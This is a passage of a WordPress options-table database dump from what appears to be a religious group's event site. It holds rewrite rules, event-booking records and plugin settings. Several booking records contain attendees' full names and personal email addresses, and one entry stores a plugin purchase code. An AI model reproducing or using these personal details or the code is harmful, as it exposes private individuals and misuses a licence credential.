matches[3]\";s:56:\"([0-9]{4})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:51:\"([0-9]{4})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:32:\"([0-9]{4})/([0-9]{1,2})/embed/?$\";s:58:\"index.php?year=$matches[1]&monthnum=$matches[2]&embed=true\";s:44:\"([0-9]{4})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:65:\"index.php?year=$matches[1]&monthnum=$matches[2]&paged=$matches[3]\";s:26:\"([0-9]{4})/([0-9]{1,2})/?$\";s:47:\"index.php?year=$matches[1]&monthnum=$matches[2]\";s:43:\"([0-9]{4})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:38:\"([0-9]{4})/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:19:\"([0-9]{4})/embed/?$\";s:37:\"index.php?year=$matches[1]&embed=true\";s:31:\"([0-9]{4})/page/?([0-9]{1,})/?$\";s:44:\"index.php?year=$matches[1]&paged=$matches[2]\";s:28:\"([0-9]{4})/verify(/(.*))?/?$\";s:45:\"index.php?year=$matches[1]&verify=$matches[3]\";s:28:\"([0-9]{4})/cancel(/(.*))?/?$\";s:45:\"index.php?year=$matches[1]&cancel=$matches[3]\";s:36:\"([0-9]{4})/gateway-cancel(/(.*))?/?$\";s:53:\"index.php?year=$matches[1]&gateway-cancel=$matches[3]\";s:36:\"([0-9]{4})/gateway-return(/(.*))?/?$\";s:53:\"index.php?year=$matches[1]&gateway-return=$matches[3]\";s:13:\"([0-9]{4})/?$\";s:26:\"index.php?year=$matches[1]\";s:27:\".?.+?/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\".?.+?/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\".?.+?/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:33:\".?.+?/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:16:\"(.?.+?)/embed/?$\";s:41:\"index.php?pagename=$matches[1]&embed=true\";s:20:\"(.?.+?)/trackback/?$\";s:35:\"index.php?pagename=$matches[1]&tb=1\";s:40:\"(.?.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:35:\"(.?.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:28:\"(.?.+?)/page/?([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&paged=$matches[2]\";s:35:\"(.?.+?)/comment-page-([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&cpage=$matches[2]\";s:31:\".?.+?/([^/]+)/verify(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&verify=$matches[3]\";s:42:\".?.+?/attachment/([^/]+)/verify(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&verify=$matches[3]\";s:31:\".?.+?/([^/]+)/cancel(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&cancel=$matches[3]\";s:42:\".?.+?/attachment/([^/]+)/cancel(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&cancel=$matches[3]\";s:39:\".?.+?/([^/]+)/gateway-cancel(/(.*))?/?$\";s:59:\"index.php?attachment=$matches[1]&gateway-cancel=$matches[3]\";s:50:\".?.+?/attachment/([^/]+)/gateway-cancel(/(.*))?/?$\";s:59:\"index.php?attachment=$matches[1]&gateway-cancel=$matches[3]\";s:39:\".?.+?/([^/]+)/gateway-return(/(.*))?/?$\";s:59:\"index.php?attachment=$matches[1]&gateway-return=$matches[3]\";s:50:\".?.+?/attachment/([^/]+)/gateway-return(/(.*))?/?$\";s:59:\"index.php?attachment=$matches[1]&gateway-return=$matches[3]\";s:24:\"(.?.+?)(?:/([0-9]+))?/?$\";s:47:\"index.php?pagename=$matches[1]&page=$matches[2]\";s:27:\"[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\"[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\"[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\"[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\"[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:33:\"[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:16:\"([^/]+)/embed/?$\";s:37:\"index.php?name=$matches[1]&embed=true\";s:20:\"([^/]+)/trackback/?$\";s:31:\"index.php?name=$matches[1]&tb=1\";s:40:\"([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?name=$matches[1]&feed=$matches[2]\";s:35:\"([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?name=$matches[1]&feed=$matches[2]\";s:28:\"([^/]+)/page/?([0-9]{1,})/?$\";s:44:\"index.php?name=$matches[1]&paged=$matches[2]\";s:35:\"([^/]+)/comment-page-([0-9]{1,})/?$\";s:44:\"index.php?name=$matches[1]&cpage=$matches[2]\";s:25:\"([^/]+)/verify(/(.*))?/?$\";s:45:\"index.php?name=$matches[1]&verify=$matches[3]\";s:25:\"([^/]+)/cancel(/(.*))?/?$\";s:45:\"index.php?name=$matches[1]&cancel=$matches[3]\";s:33:\"([^/]+)/gateway-cancel(/(.*))?/?$\";s:53:\"index.php?name=$matches[1]&gateway-cancel=$matches[3]\";s:33:\"([^/]+)/gateway-return(/(.*))?/?$\";s:53:\"index.php?name=$matches[1]&gateway-return=$matches[3]\";s:31:\"[^/]+/([^/]+)/verify(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&verify=$matches[3]\";s:42:\"[^/]+/attachment/([^/]+)/verify(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&verify=$matches[3]\";s:31:\"[^/]+/([^/]+)/cancel(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&cancel=$matches[3]\";s:42:\"[^/]+/attachment/([^/]+)/cancel(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&cancel=$matches[3]\";s:39:\"[^/]+/([^/]+)/gateway-cancel(/(.*))?/?$\";s:59:\"index.php?attachment=$matches[1]&gateway-cancel=$matches[3]\";s:50:\"[^/]+/attachment/([^/]+)/gateway-cancel(/(.*))?/?$\";s:59:\"index.php?attachment=$matches[1]&gateway-cancel=$matches[3]\";s:39:\"[^/]+/([^/]+)/gateway-return(/(.*))?/?$\";s:59:\"index.php?attachment=$matches[1]&gateway-return=$matches[3]\";s:50:\"[^/]+/attachment/([^/]+)/gateway-return(/(.*))?/?$\";s:59:\"index.php?attachment=$matches[1]&gateway-return=$matches[3]\";s:24:\"([^/]+)(?:/([0-9]+))?/?$\";s:43:\"index.php?name=$matches[1]&page=$matches[2]\";s:16:\"[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:26:\"[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:46:\"[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:41:\"[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:41:\"[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:22:\"[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";}','yes'),(7371816,'wp-optimize-webp_conversion','1','yes'),(7428474,'DOZ50327','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"jiuuumaluk@gmail.com\";s:4:\"name\";s:14:\"Jorge Santiago\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1686479400:1686483000\";s:8:\"event_id\";s:6:\"268482\";s:19:\"translated_event_id\";s:6:\"268482\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:268616;s:11:\"invoice_key\";s:32:\"4e2b18f0720d84114d4a209373c695c1\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"jiuuumaluk@gmail.com\";s:4:\"name\";s:14:\"Jorge Santiago\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(7438010,'PYX90518_cached','a:1:{i:0;a:24:{s:5:\"email\";s:21:\"eileenjoy12@gmail.com\";s:4:\"name\";s:10:\"Eileen Joy\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1684060200:1684063800\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1684060200;s:20:\"ticket_timestamp_end\";i:1684107000;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438000,'YON92518_cached','a:1:{i:0;a:24:{s:5:\"email\";s:22:\"Antiasandsun@gmail.com\";s:4:\"name\";s:16:\"Anitha Nakakena \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1686479400:1686483000\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1686479400;s:20:\"ticket_timestamp_end\";i:1686526200;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7423059,'JUR56597','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"rmorandi@comcast.net\";s:4:\"name\";s:13:\"Roger Morandi\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1686479400:1686483000\";s:8:\"event_id\";s:6:\"268482\";s:19:\"translated_event_id\";s:6:\"268482\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:268602;s:11:\"invoice_key\";s:32:\"3b03ee24f307d06df0aaf8364bb9fd7d\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"rmorandi@comcast.net\";s:4:\"name\";s:13:\"Roger Morandi\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(7409151,'MLC23904','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:21:\"eileenjoy12@gmail.com\";s:4:\"name\";s:10:\"Eileen Joy\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1686479400:1686483000\";s:8:\"event_id\";s:6:\"268482\";s:19:\"translated_event_id\";s:6:\"268482\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:268532;s:11:\"invoice_key\";s:32:\"058b908646cb0d772331ce9e05fe2e11\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:21:\"eileenjoy12@gmail.com\";s:4:\"name\";s:10:\"Eileen Joy\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(7423584,'OUW18714','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:19:\"Molliesch@gmail.com\";s:4:\"name\";s:6:\"Mollie\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1686479400:1686483000\";s:8:\"event_id\";s:6:\"268482\";s:19:\"translated_event_id\";s:6:\"268482\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:268605;s:11:\"invoice_key\";s:32:\"b039bf755ebb2d7c0ddfde4ab3d38999\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:19:\"Molliesch@gmail.com\";s:4:\"name\";s:6:\"Mollie\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(7529429,'PFH36224','a:24:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"choll.03@comcast.net\";s:4:\"name\";s:4:\"Test\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:13:\"first_for_all\";b:0;s:8:\"event_id\";s:6:\"268730\";s:19:\"translated_event_id\";s:6:\"268730\";s:4:\"date\";s:21:\"1694341800:1694345400\";s:9:\"all_dates\";a:0:{}s:10:\"timestamps\";a:1:{i:0;s:21:\"1694341800:1694345400\";}s:10:\"booking_id\";i:269028;s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:7:\"payable\";i:0;s:6:\"coupon\";N;s:6:\"fields\";a:0:{}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:8:\"order_id\";s:0:\"\";s:5:\"WCTax\";s:0:\"\";s:10:\"wc_coupons\";a:0:{}s:12:\"wc_discounts\";a:0:{}s:18:\"is_partial_payment\";i:0;s:24:\"partial_payment_settings\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"payable\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:8:\"Subtotal\";s:4:\"type\";s:7:\"tickets\";}}}s:11:\"invoice_key\";s:32:\"7dbb7423786afbb9fdd212cf731c858a\";}','no'),(7529109,'mec_cart_886794446','a:0:{}','no'),(7529586,'KSW83620','a:24:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:21:\"ocekenedili@yahoo.com\";s:4:\"name\";s:17:\"Chukwuebuka Okwor\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:13:\"first_for_all\";b:0;s:8:\"event_id\";s:6:\"268730\";s:19:\"translated_event_id\";s:6:\"268730\";s:4:\"date\";s:21:\"1694341800:1694345400\";s:9:\"all_dates\";a:0:{}s:10:\"timestamps\";a:1:{i:0;s:21:\"1694341800:1694345400\";}s:10:\"booking_id\";i:269029;s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:7:\"payable\";i:0;s:6:\"coupon\";N;s:6:\"fields\";a:0:{}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:8:\"order_id\";s:0:\"\";s:5:\"WCTax\";s:0:\"\";s:10:\"wc_coupons\";a:0:{}s:12:\"wc_discounts\";a:0:{}s:18:\"is_partial_payment\";i:0;s:24:\"partial_payment_settings\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"payable\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:8:\"Subtotal\";s:4:\"type\";s:7:\"tickets\";}}}s:11:\"invoice_key\";s:32:\"b2091d5dc78875593119bb93b40730e2\";}','no'),(7529431,'mec_cart_705753716','a:0:{}','no'),(7438021,'SMD96569_cached','a:1:{i:0;a:24:{s:5:\"email\";s:20:\"joanna3064@gmail.com\";s:4:\"name\";s:6:\"Joanne\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1681036200:1681039800\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1681036200;s:20:\"ticket_timestamp_end\";i:1681083000;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438022,'ZGQ88479_cached','a:1:{i:0;a:24:{s:5:\"email\";s:16:\"amhynes7@msn.com\";s:4:\"name\";s:11:\"Agnes Hynes\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1681036200:1681039800\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1681036200;s:20:\"ticket_timestamp_end\";i:1681083000;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438023,'AOX10183_cached','a:1:{i:0;a:24:{s:5:\"email\";s:22:\"utah.eckpres@gmail.com\";s:4:\"name\";s:13:\"Roger Morandi\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1681036200:1681039800\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1681036200;s:20:\"ticket_timestamp_end\";i:1681083000;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7332526,'_site_transient_update_themes','O:8:\"stdClass\":5:{s:12:\"last_checked\";i:1699375906;s:7:\"checked\";a:2:{s:14:\"boldgrid-hydra\";s:6:\"1.25.9\";s:17:\"twentytwentythree\";s:3:\"1.2\";}s:8:\"response\";a:0:{}s:9:\"no_update\";a:1:{s:17:\"twentytwentythree\";a:6:{s:5:\"theme\";s:17:\"twentytwentythree\";s:11:\"new_version\";s:3:\"1.2\";s:3:\"url\";s:47:\"https://wordpress.org/themes/twentytwentythree/\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/theme/twentytwentythree.1.2.zip\";s:8:\"requires\";s:3:\"6.1\";s:12:\"requires_php\";s:3:\"5.6\";}}s:12:\"translations\";a:0:{}}','no'),(4401634,'updraft_lock_51263630398f','1620766041','no'),(4426566,'_transient__tribe_events_delayed_flush_rewrite_rules','yes','yes'),(4689150,'wp_mail_smtp_lite_sent_email_counter','2728','yes'),(4731874,'is_folder_checked_for_old_data','1','yes'),(4832540,'widget_block','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(4832551,'wp_force_deactivated_plugins','a:0:{}','yes'),(4937239,'wp_mail_smtp_debug_events_db_version','1','yes'),(4937376,'mec_core_db','6.10.5','yes'),(4938500,'wp_mail_smtp_lite_weekly_sent_email_counter','a:12:{s:2:\"05\";i:23;s:2:\"06\";i:27;s:2:\"07\";i:16;s:2:\"08\";i:20;s:2:\"09\";i:34;i:10;i:34;i:11;i:19;i:12;i:17;i:13;i:18;i:14;i:30;i:15;i:15;i:16;i:2;}','yes'),(4991855,'mec_table_version_wpcl_mec_attendees','1.1.0','yes'),(5060175,'sfnf_licenses','','yes'),(5060235,'mec_fluent_options','a:3:{s:12:\"product_name\";s:19:\"Fluent-view Layouts\";s:13:\"purchase_code\";s:32:\"23d43d0a42dc5f13abef9144e09473e3\";s:10:\"product_id\";s:7:\"5331772\";}','yes'),(5091855,'fluentform_entry_details_migrated','yes','no'),(5091856,'fluentform_db_fluentform_logs_added','1','no'),(5091857,'fluentform_scheduled_actions_migrated','yes','no'),(5091858,'__fluentform_global_form_settings','a:1:{s:6:\"layout\";a:5:{s:14:\"labelPlacement\";s:3:\"top\";s:17:\"asteriskPlacement\";s:14:\"asterisk-right\";s:20:\"helpMessagePlacement\";s:10:\"with_label\";s:21:\"errorMessagePlacement\";s:6:\"inline\";s:12:\"cssClassName\";s:0:\"\";}}','no'),(5091859,'_fluentform_installed_version','5.0.7','no'),(5091860,'fluentform_global_modules_status','a:9:{s:9:\"mailchimp\";s:2:\"no\";s:14:\"activecampaign\";s:2:\"no\";s:16:\"campaign_monitor\";s:2:\"no\";s:17:\"constatantcontact\";s:2:\"no\";s:11:\"getresponse\";s:2:\"no\";s:8:\"icontact\";s:2:\"no\";s:7:\"webhook\";s:2:\"no\";s:6:\"zapier\";s:2:\"no\";s:5:\"slack\";s:2:\"no\";}','no'),(5091865,'widget_fluentform_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(5314023,'betterdocs_settings','a:73:{s:11:\"multiple_kb\";s:3:\"off\";s:8:\"doc_page\";s:3:\"off\";s:11:\"live_search\";s:3:\"off\";s:15:\"kb_based_search\";s:3:\"off\";s:25:\"alphabetically_order_term\";s:3:\"off\";s:18:\"nested_subcategory\";s:3:\"off\";s:10:\"doc_single\";s:3:\"off\";s:22:\"collapsible_toc_mobile\";s:3:\"off\";s:14:\"enable_comment\";s:3:\"off\";s:18:\"archive_page_title\";s:3:\"off\";s:15:\"customizer_link\";s:3:\"off\";s:9:\"rms_title\";s:3:\"off\";s:13:\"article_roles\";s:3:\"off\";s:14:\"settings_roles\";s:3:\"off\";s:15:\"analytics_roles\";s:3:\"off\";s:25:\"content_restriction_title\";s:3:\"off\";s:31:\"enable_content_restriction_free\";s:3:\"off\";s:8:\"ia_title\";s:3:\"off\";s:14:\"ia_description\";s:3:\"off\";s:19:\"enable_disable_free\";s:3:\"off\";s:22:\"ia_enable_preview_free\";s:3:\"off\";s:8:\"ia_image\";s:3:\"off\";s:16:\"builtin_doc_page\";s:1:\"1\";s:20:\"breadcrumb_doc_title\";s:4:\"Docs\";s:9:\"docs_slug\";s:4:\"docs\";s:9:\"docs_page\";s:1:\"0\";s:13:\"category_slug\";s:13:\"docs-category\";s:8:\"tag_slug\";s:8:\"docs-tag\";s:19:\"permalink_structure\";s:4:\"docs\";s:18:\"search_placeholder\";s:8:\"Search..\";s:21:\"search_not_found_text\";s:26:\"Sorry, no docs were found.\";s:19:\"search_result_image\";s:1:\"1\";s:14:\"masonry_layout\";s:1:\"1\";s:25:\"alphabetically_order_post\";s:4:\"none\";s:10:\"docs_order\";s:3:\"ASC\";s:13:\"column_number\";s:1:\"3\";s:12:\"posts_number\";s:2:\"10\";s:10:\"post_count\";s:1:\"1\";s:10:\"count_text\";s:8:\"articles\";s:19:\"count_text_singular\";s:7:\"article\";s:15:\"exploremore_btn\";s:1:\"1\";s:19:\"exploremore_btn_txt\";s:12:\"Explore More\";s:10:\"enable_toc\";s:1:\"1\";s:9:\"toc_title\";s:17:\"Table of Contents\";s:13:\"toc_hierarchy\";s:1:\"1\";s:15:\"toc_list_number\";s:1:\"1\";s:17:\"enable_sticky_toc\";s:1:\"1\";s:17:\"sticky_toc_offset\";s:3:\"100\";s:21:\"supported_heading_tag\";a:6:{i:0;s:1:\"1\";i:1;s:1:\"2\";i:2;s:1:\"3\";i:3;s:1:\"4\";i:4;s:1:\"5\";i:5;s:1:\"6\";}s:17:\"enable_post_title\";s:1:\"1\";s:14:\"title_link_ctc\";s:1:\"1\";s:17:\"enable_breadcrumb\";s:1:\"1\";s:20:\"breadcrumb_home_text\";s:4:\"Home\";s:19:\"breadcrumb_home_url\";s:29:\"https://eckankar-colorado.org\";s:26:\"enable_breadcrumb_category\";s:1:\"1\";s:23:\"enable_breadcrumb_title\";s:1:\"1\";s:23:\"enable_sidebar_cat_list\";s:1:\"1\";s:17:\"enable_print_icon\";s:1:\"1\";s:11:\"enable_tags\";s:1:\"1\";s:14:\"email_feedback\";s:1:\"1\";s:18:\"feedback_link_text\";s:29:\"Still stuck? How can we help?\";s:19:\"feedback_form_title\";s:16:\"How can we help?\";s:13:\"email_address\";s:31:\"webmaster@eckankar-colorado.org\";s:21:\"show_last_update_time\";s:1:\"1\";s:17:\"enable_navigation\";s:1:\"1\";s:13:\"enable_credit\";s:1:\"1\";s:22:\"enable_archive_sidebar\";s:1:\"1\";s:26:\"archive_nested_subcategory\";s:1:\"1\";s:11:\"search_form\";s:24:\"[betterdocs_search_form]\";s:13:\"feedback_form\";s:26:\"[betterdocs_feedback_form]\";s:13:\"category_grid\";s:26:\"[betterdocs_category_grid]\";s:12:\"category_box\";s:25:\"[betterdocs_category_box]\";s:13:\"category_list\";s:26:\"[betterdocs_category_list]\";}','yes'),(5314058,'doc_category_children','a:0:{}','yes'),(5587301,'disable_comment_version','2.4.5','yes'),(5587357,'duplicate_post_show_notice','','no'),(5682291,'theme_mods_twentytwentyone','a:1:{s:18:\"custom_css_post_id\";i:-1;}','yes'),(5837545,'modula_version','a:2:{s:13:\"upgraded_from\";s:5:\"2.6.2\";s:15:\"current_version\";s:5:\"2.6.6\";}','yes'),(5837552,'widget_modula_gallery_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(5837553,'modula-rate-time','1805489842','yes'),(5837557,'modula_wisd